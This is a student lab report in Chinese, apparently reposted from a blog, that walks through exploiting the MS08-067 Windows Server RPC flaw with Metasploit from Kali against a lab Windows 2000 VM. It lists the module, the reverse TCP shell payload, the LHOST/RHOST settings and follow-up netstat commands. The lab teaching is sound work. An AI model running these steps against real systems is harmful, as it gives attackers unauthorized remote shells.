2017-2018-2 20179205《网络攻防技术与实践》Windows攻击实验

Windows攻击实验

实验描述:

使用Metaspoit攻击MS08-067,提交正确得到远程shell过程的截图(不少于五张)。

MS08-067漏洞介绍

  MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

实验工具

本次实验使用的攻击机是kali,靶机是Win2kServer

攻击机:192.168.92.147
靶机:192.168.92.148

实验步骤:

1.首先攻击机和靶机互ping,在kali终端开启msfconsole

1249685-20180418145817526-601014704.png

1249685-20180418145833143-1228771269.png

2.查找是否存在ms08_067漏洞,查看返回信息,会显示出找到的渗透模块

1249685-20180418150017608-1061365467.png

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入利用该漏洞模块。接下来可输入一些命令来显示一些信息,如:

输入show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp

1249685-20180418150419298-820275409.png

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

1249685-20180418150757286-910839919.png

输入show targets会显示出可以被攻击的靶机的操作系统型号

1249685-20180418150558170-503678451.png

4.输入show options显示我们需要在攻击前需要设置的数据

1249685-20180418150855085-936061546.png

5.设置攻击机和靶机地址,并使用命令show options再次查看payload状态

输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.147;
输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.148;

1249685-20180418151346637-655833702.png

6.输入命令exploit开始攻击,下图为正常攻击成功结果

1249685-20180418151450482-1888516365.png

7.在攻击机和靶机中分别查看IP地址,输入ipconfig/all,发现结果一致

1249685-20180418151709966-1902932104.png

1249685-20180418151724117-1750163514.png

8.输入“netstat -a”命令,可以查看靶机开启了哪些端口

1249685-20180418151843602-1205996841.png

9.输入“netstat -n”命令, 查看靶机端口的网络连接情况

1249685-20180418151917454-1674506016.png

转载于:https://www.cnblogs.com/wyz-1995/p/8875098.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值